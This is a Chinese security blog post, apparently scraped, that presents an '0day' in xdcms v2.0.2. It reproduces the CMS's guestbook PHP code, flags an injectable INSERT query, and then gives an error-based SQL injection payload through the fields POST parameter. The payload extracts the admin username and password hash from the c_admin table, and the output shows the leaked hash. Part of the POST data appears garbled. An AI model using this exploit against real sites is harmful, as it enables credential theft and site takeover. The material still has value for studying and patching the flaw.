开始吧
在留言的地方
lists.php文件
<?php
class lists extends db{
public function init(){
$input=base::load_class('input');
$formid=isset($_GET['formid'])?intval($_GET['formid']):0;
$form_arr=base::load_cache("cache_form","_form");
$form=get_array($form_arr,'id',$formid,0);
$field=base::load_cache("cache_form_".$form[0]['form_table'],"_field");
$fields="";
if(is_array($field)){
foreach($field as $value){
$fields.="<tr>n";
$fields.="<td align="right">".$value['name'].":</td>n";
$fields.="<td>".$input->$value['formtype']($value['field'],'',$value['width'],$value['height'],$value['initial'])." ".$value['explain']."</td>n";
$fields.="</tr>n";
}
//是否显示验证码
if($form['0']['is_code']==1){
$fields.="<tr>n";
$fields.="<td align="right">验证码:</td>n";
$fields.="<td><input type="text" name="verifycode" id="verifycode" class="txt" /><img src="adminerifycode.php" border="0" alt="验证码,看不清楚?请点击刷新验证码" onClick="this.src=this.src+'?'+Math.random();" class="codeimage"/></td>n";
$fields.="</tr>n";
}
}
assign("form",$form[0]);
assign("fields",$fields);
assign('menu',get_menu(0,1));
template("form_list");
}
$formid=safe_html($_GET['formid']);
$form_arr=base::load_cache("cache_form","_form");
$form=get_array($form_arr,'id',$formid,0);
$fields=$_POST['fields'];
$verifycode=$_POST['verifycode'];
//验证码
if($form['0']['is_code']==1 && $verifycode!=$_SESSION['code']){
showmsg(C('verifycode_error'),'-1');
}
if(empty($fields['title'])||empty($formid)){
showmsg(C('material_not_complete'),'-1');
}
$form=formtable($formid);
if(empty($form)){
showmsg(C('error'),'-1');
}
$table=$this->mysql->show_table(); //判断数据表是否存在
if(!in_array(DB_PRE.$form,$table)){
showmsg(C('table_not_exist'),'-1');
}
//添加附加表
$sql_fields='`inputtime`';
$sql_value=datetime();
$send_text='留言内容:<br>';
foreach($fields as $key=>$value){
if(is_array($value)){
$value_arr='';
foreach($value as $k=>$v){
$value_arr.=$v.',';
}
$value=$value_arr;
}
$sql_value.=","".safe_replace(safe_html($value)).""";
$send_text.=safe_replace(safe_html($value))."<br>";
}
$this->mysql->query("insert into ".DB_PRE.$form."({$sql_fields}) values ({$sql_value})"); //这个地址存在注入问题 From HdhCmsTestadmin163.net
$rs=$this->mysql->get_one("select * from ".DB_PRE."form where id=".$formid);
if($rs['is_email']==1){
sendmail('有人给您留言了!',$send_text);
}
showmsg(C('add_success'),'-1');
}
}
?>
现在上利用代码看看:
POST数据
&fields%5B
&submit=+%CC%E1+%BD%BB+
操作 数据库 失败Duplicate entry 'ouou~admin-5a0408a553574230cd46a508b03af127~11' for key 'group_key'
sql:insert into c_message(`inputtime`,`title`,`ooxx`) values(1,1, (select 1 from(select count(*),concat((select (select (SELECT concat(0x6F756F757E,username,0x2D,password,0x7E31) FROM c_admin limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a))#`,`address`,`content`) values(1351247382,"1","22","4","55555")
ok.
查看更多关于xdcms v2.0.2 0DAY - 网站安全 - 自学php的详细内容...